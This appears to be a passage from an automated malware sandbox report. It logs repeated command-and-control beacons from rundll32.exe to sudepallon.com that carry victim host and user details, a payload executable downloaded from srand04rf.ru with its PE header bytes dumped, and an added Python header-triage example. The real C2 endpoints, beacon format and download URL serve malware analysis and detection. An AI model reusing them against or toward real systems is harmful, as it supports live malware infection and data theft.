                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                              Host: sudepallon.com
                              Content-Length: 121
                              Cache-Control: no-cache
                              Data Raw: 47 55 49 44 3d 31 32 34 35 38 31 34 33 35 35 30 32 30 34 30 31 35 38 35 32 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 37 38 33 38 37 35 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                              Data Ascii: GUID=12458143550204015852&BUILD=0707_wvcr&INFO=783875 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=10.0(x64)
                              Jul 9, 2021 03:11:29.162270069 CEST | 686 | IN | HTTP/1.1 200 OK
                              Server: nginx/1.20.1
                              Date: Fri, 09 Jul 2021 01:11:30 GMT
                              Content-Type: text/html
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              X-Powered-By: PHP/5.4.45
                              Data Raw: 63 0d 0a 42 48 53 59 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: cBHSYARRABw==0


                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                              15 | 192.168.2.3 | 49735 | 77.222.42.67 | 80 | C:\Windows\SysWOW64\rundll32.exe
                              Timestamp | kBytes transferred | Direction | Data
                              Jul 9, 2021 03:11:30.061108112 CEST | 687 | OUT | POST /8/forum.php HTTP/1.1
                              Accept: */*
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                              Host: sudepallon.com
                              Content-Length: 121
                              Cache-Control: no-cache
                              Data Raw: 47 55 49 44 3d 31 32 34 35 38 31 34 33 35 35 30 32 30 34 30 31 35 38 35 32 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 37 38 33 38 37 35 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                              Data Ascii: GUID=12458143550204015852&BUILD=0707_wvcr&INFO=783875 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=10.0(x64)
                               Jul 9, 2021 03:11:30.127890110 CEST | 687 | IN | HTTP/1.1 200 OK
                              Server: nginx/1.20.1
                              Date: Fri, 09 Jul 2021 01:11:31 GMT
                              Content-Type: text/html
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              X-Powered-By: PHP/5.4.45
                              Data Raw: 63 0d 0a 48 46 55 53 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: cHFUSARRABw==0


                               Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                               16 | 192.168.2.3 | 49736 | 77.222.42.67 | 80 | C:\Windows\SysWOW64\rundll32.exe
                               Timestamp | kBytes transferred | Direction | Data
                               Jul 9, 2021 03:11:30.953383923 CEST | 688 | OUT | POST /8/forum.php HTTP/1.1
                              Accept: */*
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                              Host: sudepallon.com
                              Content-Length: 121
                              Cache-Control: no-cache
                              Data Raw: 47 55 49 44 3d 31 32 34 35 38 31 34 33 35 35 30 32 30 34 30 31 35 38 35 32 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 37 38 33 38 37 35 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                              Data Ascii: GUID=12458143550204015852&BUILD=0707_wvcr&INFO=783875 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=10.0(x64)
                               Jul 9, 2021 03:11:31.021161079 CEST | 688 | IN | HTTP/1.1 200 OK
                              Server: nginx/1.20.1
                              Date: Fri, 09 Jul 2021 01:11:32 GMT
                              Content-Type: text/html
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              X-Powered-By: PHP/5.4.45
                              Data Raw: 63 0d 0a 59 5a 41 42 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: cYZABARRABw==0


                               Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                               17 | 192.168.2.3 | 49737 | 77.222.42.67 | 80 | C:\Windows\SysWOW64\rundll32.exe
                               Timestamp | kBytes transferred | Direction | Data
                               Jul 9, 2021 03:11:31.867690086 CEST | 689 | OUT | POST /8/forum.php HTTP/1.1
                              Accept: */*
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                              Host: sudepallon.com
                              Content-Length: 121
                              Cache-Control: no-cache
                              Data Raw: 47 55 49 44 3d 31 32 34 35 38 31 34 33 35 35 30 32 30 34 30 31 35 38 35 32 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 37 38 33 38 37 35 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                              Data Ascii: GUID=12458143550204015852&BUILD=0707_wvcr&INFO=783875 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=10.0(x64)
                               Jul 9, 2021 03:11:31.935698032 CEST | 689 | IN | HTTP/1.1 200 OK
                              Server: nginx/1.20.1
                              Date: Fri, 09 Jul 2021 01:11:33 GMT
                              Content-Type: text/html
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              X-Powered-By: PHP/5.4.45
                              Data Raw: 63 0d 0a 56 4e 4d 45 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: cVNMEARRABw==0


                               Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                               18 | 192.168.2.3 | 49738 | 77.222.42.67 | 80 | C:\Windows\SysWOW64\rundll32.exe
                               Timestamp | kBytes transferred | Direction | Data
                               Jul 9, 2021 03:11:32.824184895 CEST | 690 | OUT | POST /8/forum.php HTTP/1.1
                              Accept: */*
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                              Host: sudepallon.com
                              Content-Length: 121
                              Cache-Control: no-cache
                              Data Raw: 47 55 49 44 3d 31 32 34 35 38 31 34 33 35 35 30 32 30 34 30 31 35 38 35 32 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 37 38 33 38 37 35 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                              Data Ascii: GUID=12458143550204015852&BUILD=0707_wvcr&INFO=783875 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=10.0(x64)
                               Jul 9, 2021 03:11:32.892543077 CEST | 690 | IN | HTTP/1.1 200 OK
                              Server: nginx/1.20.1
                              Date: Fri, 09 Jul 2021 01:11:34 GMT
                              Content-Type: text/html
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              X-Powered-By: PHP/5.4.45
                              Data Raw: 63 0d 0a 4e 4d 4e 4d 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: cNMNMARRABw==0


                               Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                               19 | 192.168.2.3 | 49739 | 77.222.42.67 | 80 | C:\Windows\SysWOW64\rundll32.exe
                               Timestamp | kBytes transferred | Direction | Data
                               Jul 9, 2021 03:11:33.724469900 CEST | 691 | OUT | POST /8/forum.php HTTP/1.1
                              Accept: */*
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                              Host: sudepallon.com
                              Content-Length: 121
                              Cache-Control: no-cache
                              Data Raw: 47 55 49 44 3d 31 32 34 35 38 31 34 33 35 35 30 32 30 34 30 31 35 38 35 32 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 37 38 33 38 37 35 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                              Data Ascii: GUID=12458143550204015852&BUILD=0707_wvcr&INFO=783875 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=10.0(x64)
                               Jul 9, 2021 03:11:33.792649984 CEST | 692 | IN | HTTP/1.1 200 OK
                              Server: nginx/1.20.1
                              Date: Fri, 09 Jul 2021 01:11:35 GMT
                              Content-Type: text/html
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              X-Powered-By: PHP/5.4.45
                              Data Raw: 63 0d 0a 4b 5a 41 50 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: cKZAPARRABw==0


                               Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                               2 | 192.168.2.3 | 49720 | 8.211.241.0 | 80 | C:\Windows\SysWOW64\rundll32.exe
                               Timestamp | kBytes transferred | Direction | Data
                               Jul 9, 2021 03:11:14.898063898 CEST | 363 | OUT | GET /7hfjsdfjks.exe HTTP/1.1
                              Accept: */*
                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                              Host: srand04rf.ru
                              Cache-Control: no-cache
                               Jul 9, 2021 03:11:15.057348013 CEST | 364 | IN | HTTP/1.1 200 OK
                              Server: nginx
                              Date: Fri, 09 Jul 2021 01:11:14 GMT
                              Content-Type: application/octet-stream
                              Content-Length: 272910
                              Connection: keep-alive
                              Last-Modified: Wed, 09 Jun 2021 16:00:40 GMT
                              ETag: "60c0e5a8-42a0e"
                              Accept-Ranges: bytes
                              Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 08 00 00 00 00 00 00 2a 04 00 00 00 00 00 e0 00 2f 03 0b 01 02 1e 00 50 03 00 00 26 04 00 00 06 00 00 80 14 00 00 00 10 00 00 00 60 03 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 80 04 00 00 04 00 00 81 81 04 00 02 00 00 01 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 50 04 00 a4 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 64 9b 03 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b4 52 04 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 44 4f 03 00 00 10 00 00 00 50 03 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 38 00 00 00 00 60 03 00 00 02 00 00 00 54 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 c0 2e 72 64 61 74 61 00 00 a8 2d 00 00 00 70 03 00 00 2e 00 00 00 56 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 40 2f 34 00 00 00 00 00 00 14 90 00 00 00 a0 03 00 00 92 00 00 00 84 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 62 73 73 00 00 00 00 40 04 00 00 00 40 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 69 64 61 74 61 00 00 a4 0e 00 00 00 50 04 00 00 10 00 00 00 16 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 38 00 00 00 00 60 04 00 00 02 00 00 00 26 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 
00 30 c0 2e 74 6c 73 00 00 00 00 08 00 00 00 00 70 04 00 00 02 00 00 00 28 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f3 c3 8d b4 26 00 00 00 00 8d bc 27 00 00 00 00 83 ec 1c 31 c0 66 81 3d 00 00 40 00 4d 5a c7 05 ec 43 44 00 01 00 00 00 c7 05 e8 43 44 00 01 00 00 00 c7 05 e4 43 44 00 01 00 00 00 c7 05 80
                              Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL*/P&`@ PdR.textDOP`P`.data8`T@@.rdata-p.V@@@/4@0@.bss@@`.idataP@0.CRT8`&@0.tlsp(@0&'1f=@MZCDCDCD
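The executable fetched in session 2 has enough of its first bytes on this page to be triaged without running it. What follows is an added example written for this page, not part of the report and not the sample's own code: it parses the DOS header, COFF file header, PE32 optional header and section table from those bytes, places the entry point and the import, TLS and IAT directories in the section map, and reports the mitigations the image opts into. PAYLOAD_HEAD is the first 0x2b8 bytes of the response transcribed from the Data Raw dump above, grouped by field; the all-zero data directories are written as repeat counts, which is an assumption only about layout, not content. The "consistent with GNU ld" verdict is the example's own reading of linker version 2.30, a retained COFF symbol table and a section named "/4"; the report itself names no compiler.

```python
"""Triage the executable fetched in session 2 (GET /7hfjsdfjks.exe) from its headers.

Added example; not code from the report or from the sample. PAYLOAD_HEAD is the
first 0x2b8 bytes of that response transcribed from the report's Data Raw dump
(DOS header, stub, COFF header, optional header, eight section headers). The
remaining bytes of the 272910-byte file are not on the page and are not needed.
"""
import struct

PAYLOAD_HEAD = bytes.fromhex(
    # IMAGE_DOS_HEADER: "MZ" ... e_lfanew = 0x80
    "4d5a9000 03000000 04000000 ffff0000 b8000000 00000000 40000000 00000000"
    "00000000 00000000 00000000 00000000 00000000 00000000 00000000 80000000"
    # DOS stub: "This program cannot be run in DOS mode."
    "0e1fba0e 00b409cd 21b8014c cd215468 69732070 726f6772 616d2063 616e6e6f"
    "74206265 2072756e 20696e20 444f5320 6d6f6465 2e0d0d0a 24000000 00000000"
    # "PE\0\0" + IMAGE_FILE_HEADER: i386, 8 sections, symbol table at 0x42a00, opt hdr 0xe0
    "50450000 4c010800 00000000 002a0400 00000000 e0002f03"
    # IMAGE_OPTIONAL_HEADER32 up to NumberOfRvaAndSizes
    "0b01021e 00500300 00260400 00060000 80140000 00100000 00600300 00004000"
    "00100000 00020000 04000000 01000000 04000000 00000000 00800400 00040000"
    "81810400 02000001 00002000 00100000 00001000 00100000 00000000 10000000"
    # 16 data directories: only import (1), TLS (9) and IAT (12) are non-zero
    "00000000 00000000 00500400 a40e0000" + "00" * 56 +
    "649b0300 18000000" + "00" * 16 + "b4520400 00020000" + "00" * 24 +
    # section table, 40 bytes per IMAGE_SECTION_HEADER
    "2e746578 74000000 444f0300 00100000 00500300 00040000 00000000 00000000 00000000 60005060"  # .text
    "2e646174 61000000 38000000 00600300 00020000 00540300 00000000 00000000 00000000 400040c0"  # .data
    "2e726461 74610000 a82d0000 00700300 002e0000 00560300 00000000 00000000 00000000 40004040"  # .rdata
    "2f340000 00000000 14900000 00a00300 00920000 00840300 00000000 00000000 00000000 40003040"  # /4
    "2e627373 00000000 40040000 00400400 00000000 00000000 00000000 00000000 00000000 800060c0"  # .bss
    "2e696461 74610000 a40e0000 00500400 00100000 00160400 00000000 00000000 00000000 400030c0"  # .idata
    "2e435254 00000000 38000000 00600400 00020000 00260400 00000000 00000000 00000000 400030c0"  # .CRT
    "2e746c73 00000000 08000000 00700400 00020000 00280400 00000000 00000000 00000000 400030c0"  # .tls
)

SECTION_HDR = struct.Struct("<8sIIIIIIHHI")  # IMAGE_SECTION_HEADER


def parse_pe(data: bytes) -> dict:
    """Walk DOS header -> PE signature -> COFF header -> PE32 optional header -> sections."""
    if data[:2] != b"MZ":
        raise ValueError("no MZ signature")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("no PE signature at e_lfanew")
    machine, nsect, _ts, symtab, _nsyms, opt_size, chars = struct.unpack_from("<HHIIIHH", data, e_lfanew + 4)
    opt = e_lfanew + 24
    magic, lmaj, lmin, _, _, _, entry, _ = struct.unpack_from("<HBBIIIII", data, opt)
    if magic != 0x10B:
        raise ValueError("only PE32 (magic 0x10b) is handled here")
    image_base = struct.unpack_from("<I", data, opt + 28)[0]
    size_of_image, _, _, subsystem, dll_chars = struct.unpack_from("<IIIHH", data, opt + 56)
    ndirs = struct.unpack_from("<I", data, opt + 92)[0]
    dirs = [struct.unpack_from("<II", data, opt + 96 + 8 * i) for i in range(ndirs)]
    sections = []
    for i in range(nsect):
        name, vsize, va, rsize, rptr, _, _, _, _, flags = SECTION_HDR.unpack_from(data, opt + opt_size + 40 * i)
        sections.append({"name": name.rstrip(b"\0").decode("ascii"), "va": va, "vsize": vsize,
                         "raw_ptr": rptr, "raw_size": rsize, "flags": flags})
    return {"machine": machine, "characteristics": chars, "symbol_table": symtab,
            "linker": (lmaj, lmin), "entry_point": entry, "image_base": image_base,
            "size_of_image": size_of_image, "subsystem": subsystem,
            "dll_characteristics": dll_chars, "data_directories": dirs, "sections": sections}


def section_for_rva(pe: dict, rva: int):
    """Name of the section containing an RVA, or None. Uses max(VirtualSize, SizeOfRawData)
    as the mapped extent, which is what the loader maps before page rounding."""
    for s in pe["sections"]:
        if s["va"] <= rva < s["va"] + max(s["vsize"], s["raw_size"]):
            return s["name"]
    return None


def triage(pe: dict) -> dict:
    """The facts a responder wants before detonating anything."""
    return {
        "is_32bit_x86": pe["machine"] == 0x14C,
        "gui_subsystem": pe["subsystem"] == 2,
        "aslr": bool(pe["dll_characteristics"] & 0x40),   # IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE
        "nx": bool(pe["dll_characteristics"] & 0x100),    # IMAGE_DLLCHARACTERISTICS_NX_COMPAT
        # Linker 2.30, a COFF symbol table kept in an EXE and a "/N" section name are
        # typical of GNU ld output (assumption: the report names no toolchain).
        "gnu_ld_signs": pe["linker"] == (2, 30) and pe["symbol_table"] != 0
                        and any(s["name"].startswith("/") for s in pe["sections"]),
        "entry_section": section_for_rva(pe, pe["entry_point"]),
        "import_section": section_for_rva(pe, pe["data_directories"][1][0]),
    }


if __name__ == "__main__":
    pe = parse_pe(PAYLOAD_HEAD)
    for s in pe["sections"]:
        print(f"{s['name']:<7} va=0x{s['va']:05x} vsize=0x{s['vsize']:05x} raw=0x{s['raw_ptr']:05x}+0x{s['raw_size']:05x}")
    print(triage(pe))
```

Two consistency checks fall out of the parse and are worth making a habit: the last section's raw data (.tls at 0x42800, size 0x200) ends exactly at PointerToSymbolTable (0x42a00), and the nginx ETag "60c0e5a8-42a0e" encodes the same 0x42a0e (272910) byte length the Content-Length header declares, so the capture is a complete, unmodified download.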


                               Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                               20 | 192.168.2.3 | 49740 | 77.222.42.67 | 80 | C:\Windows\SysWOW64\rundll32.exe
                               Timestamp | kBytes transferred | Direction | Data
                               Jul 9, 2021 03:11:34.642386913 CEST | 692 | OUT | POST /8/forum.php HTTP/1.1
                              Accept: */*
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                              Host: sudepallon.com
                              Content-Length: 121
                              Cache-Control: no-cache
                              Data Raw: 47 55 49 44 3d 31 32 34 35 38 31 34 33 35 35 30 32 30 34 30 31 35 38 35 32 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 37 38 33 38 37 35 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                              Data Ascii: GUID=12458143550204015852&BUILD=0707_wvcr&INFO=783875 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=10.0(x64)
                               Jul 9, 2021 03:11:34.710644007 CEST | 693 | IN | HTTP/1.1 200 OK
                              Server: nginx/1.20.1
                              Date: Fri, 09 Jul 2021 01:11:36 GMT
                              Content-Type: text/html
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              X-Powered-By: PHP/5.4.45
                              Data Raw: 63 0d 0a 4a 4a 51 51 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: cJJQQARRABw==0


                               Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                               21 | 192.168.2.3 | 49741 | 77.222.42.67 | 80 | C:\Windows\SysWOW64\rundll32.exe
                               Timestamp | kBytes transferred | Direction | Data
                               Jul 9, 2021 03:11:41.325825930 CEST | 694 | OUT | POST /8/forum.php HTTP/1.1
                              Accept: */*
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                              Host: sudepallon.com
                              Content-Length: 121
                              Cache-Control: no-cache
                              Data Raw: 47 55 49 44 3d 31 32 34 35 38 31 34 33 35 35 30 32 30 34 30 31 35 38 35 32 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 37 38 33 38 37 35 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                              Data Ascii: GUID=12458143550204015852&BUILD=0707_wvcr&INFO=783875 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=10.0(x64)
                               Jul 9, 2021 03:11:41.393680096 CEST | 695 | IN | HTTP/1.1 200 OK
                              Server: nginx/1.20.1
                              Date: Fri, 09 Jul 2021 01:11:42 GMT
                              Content-Type: text/html
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              X-Powered-By: PHP/5.4.45
                              Data Raw: 63 0d 0a 41 43 58 5a 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: cACXZARRABw==0


                               Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                               22 | 192.168.2.3 | 49742 | 77.222.42.67 | 80 | C:\Windows\SysWOW64\rundll32.exe
                               Timestamp | kBytes transferred | Direction | Data
                               Jul 9, 2021 03:11:42.363435030 CEST | 695 | OUT | POST /8/forum.php HTTP/1.1
                              Accept: */*
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                              Host: sudepallon.com
                              Content-Length: 121
                              Cache-Control: no-cache
                              Data Raw: 47 55 49 44 3d 31 32 34 35 38 31 34 33 35 35 30 32 30 34 30 31 35 38 35 32 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 37 38 33 38 37 35 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                              Data Ascii: GUID=12458143550204015852&BUILD=0707_wvcr&INFO=783875 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=10.0(x64)
                               Jul 9, 2021 03:11:42.432069063 CEST | 696 | IN | HTTP/1.1 200 OK
                              Server: nginx/1.20.1
                              Date: Fri, 09 Jul 2021 01:11:44 GMT
                              Content-Type: text/html
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              X-Powered-By: PHP/5.4.45
                              Data Raw: 63 0d 0a 48 54 47 53 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: cHTGSARRABw==0


                               Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                               23 | 192.168.2.3 | 49743 | 77.222.42.67 | 80 | C:\Windows\SysWOW64\rundll32.exe
                               Timestamp | kBytes transferred | Direction | Data
                               Jul 9, 2021 03:11:43.297147036 CEST | 702 | OUT | POST /8/forum.php HTTP/1.1
                              Accept: */*
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                              Host: sudepallon.com
                              Content-Length: 121
                              Cache-Control: no-cache
                              Data Raw: 47 55 49 44 3d 31 32 34 35 38 31 34 33 35 35 30 32 30 34 30 31 35 38 35 32 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 37 38 33 38 37 35 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                              Data Ascii: GUID=12458143550204015852&BUILD=0707_wvcr&INFO=783875 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=10.0(x64)
                               Jul 9, 2021 03:11:43.364032030 CEST | 703 | IN | HTTP/1.1 200 OK
                              Server: nginx/1.20.1
                              Date: Fri, 09 Jul 2021 01:11:44 GMT
                              Content-Type: text/html
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              X-Powered-By: PHP/5.4.45
                              Data Raw: 63 0d 0a 56 54 47 45 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: cVTGEARRABw==0


                               Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                               24 | 192.168.2.3 | 49744 | 77.222.42.67 | 80 | C:\Windows\SysWOW64\rundll32.exe
                               Timestamp | kBytes transferred | Direction | Data
                               Jul 9, 2021 03:11:44.273397923 CEST | 704 | OUT | POST /8/forum.php HTTP/1.1
                              Accept: */*
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                              Host: sudepallon.com
                              Content-Length: 121
                              Cache-Control: no-cache
